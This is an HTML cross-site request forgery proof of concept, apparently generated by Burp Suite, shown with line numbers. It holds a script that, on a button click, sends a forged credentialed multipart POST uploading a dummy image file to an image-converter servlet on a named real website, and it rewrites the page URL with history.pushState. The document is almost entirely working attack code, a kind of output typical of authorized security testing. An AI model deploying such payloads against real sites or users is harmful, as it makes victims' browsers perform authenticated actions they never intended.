<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body>

1. <html>
2.   <!-- CSRF PoC - generated by Burp Suite Professional -->
3.   <body>
4.   <script>history.pushState('', '', '/')</script>
5.     <script>
6.       function submitRequest()
7.       {
8.         var xhr = new XMLHttpRequest();
9.         xhr.open("POST", "https:\/\/www.online-utility.org\/servlet\/ImageConverter", true);
10.         xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
11.         xhr.setRequestHeader("Accept-Language", "fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3");
12.         xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------206860758214748693911873600863");
13.         xhr.withCredentials = true;
14.         var body = "-----------------------------206860758214748693911873600863\r\n" +
15.           "Content-Disposition: form-data; name=\"fname\"; filename=\"Logo_sstic_transp.png\"\r\n" +
16.           "Content-Type: image/png\r\n" +
17.           "\r\n" +
18.           "BLABLA\r\n" +
19.           "-----------------------------206860758214748693911873600863\r\n" +
20.           "Content-Disposition: form-data; name=\"totot\"\r\n" +
21.           "Content-Type: image/png\r\n" +
22.           "\r\n" +
23.           "titit\r\n" +
24.           "-----------------------------206860758214748693911873600863--\r\n";
25.         var aBody = new Uint8Array(body.length);
26.         for (var i = 0; i < aBody.length; i++)
27.          aBody[i] = body.charCodeAt(i);
28.        xhr.send(new Blob([aBody]));
29.      }
30.    </script>
31.     <form action="#">
32.       <input type="button" value="Submit request" onclick="submitRequest();" />
33.     </form>
34.   </body>
35. </html>